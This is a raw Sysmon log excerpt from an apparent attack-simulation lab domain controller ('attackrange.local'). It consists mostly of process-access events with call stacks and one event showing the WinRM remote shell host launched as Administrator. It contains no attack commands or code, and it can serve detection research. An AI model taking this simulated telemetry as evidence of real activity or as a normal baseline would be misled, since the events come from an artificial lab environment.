08:41:57.714{5D479F2C-16D5-5F84-7800-000000007F01}47324752C:\Windows\system32\conhost.exe{5D479F2C-16D5-5F84-7700-000000007F01}4720C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002599Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.714{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16D5-5F84-7800-000000007F01}4732C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002598Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002597Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002596Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002595Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002594Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002593Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002592Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002591Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002590Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002589Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.714{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16D5-5F84-7700-000000007F01}4720C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002588Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16D5-5F84-7700-000000007F01}4720C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002587Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.719{5D479F2C-16D5-5F84-7700-000000007F01}4720C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{5D479F2C-16D5-5F84-78B9-040000000000}0x4b9780HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002586Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.714{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002585Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.698{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16D5-5F84-7600-000000007F01}4680C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002584Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.698{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16D5-5F84-7600-000000007F01}4680C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002583Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.698{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16D5-5F84-7600-000000007F01}4680C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002582Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.698{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002581Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.667{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002580Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.667{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002579Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.667{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002578Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.370{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002577Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.370{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002576Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.370{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002575Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.370{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002574Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 